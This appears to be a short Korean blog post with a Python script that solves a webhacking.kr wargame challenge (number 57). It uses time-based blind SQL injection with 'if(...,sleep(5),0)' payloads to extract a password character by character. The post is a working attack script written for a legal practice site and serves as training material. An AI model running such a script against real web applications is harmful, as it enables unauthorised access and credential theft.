if문+sleep을 이용한 blind sql injection
#webhacking 57 import http.client import time import string con=http.client.HTTPConnection('webhacking.kr') def sql(se): head={'Host':'webhacking.kr'} head['Upgrade-Insecure-Requests']=1 head['Cookie']='id=aaaa; PHPSESSID=ddddd' bf=time.time() con.request('GET','/challenge/web/web-34/index.php?msg=111&se='+se,headers=head) r=con.getresponse().read() af=time.time() return af-bf>=4 #print(sql('if(length(pw)=10,sleep(5),0)')) arr=string.ascii_letters+'1234567890' pw='' for i in range(1,11): for j,a in enumerate(arr): q='if(ascii(substring(pw,%d,1))=%d,sleep(5),0)' %(i,ord(a)) t=sql(q) #print(q) print(a) if t: pw+=a print(pw) break print(pw)
'war game > webhacking.kr' 카테고리의 다른 글
| [webhacking.kr]2번-blindsql (0) | 2017.02.19 |
|---|---|
| [webhacking.kr] 41번 (0) | 2017.02.01 |
| [webhacking.kr]55번 left right을 이용한 blind sql (0) | 2017.01.31 |
| [webhacking.kr]22번 blind sql injection binary search (0) | 2017.01.30 |
| [webhacking.kr 21]blind sql injection (0) | 2017.01.30 |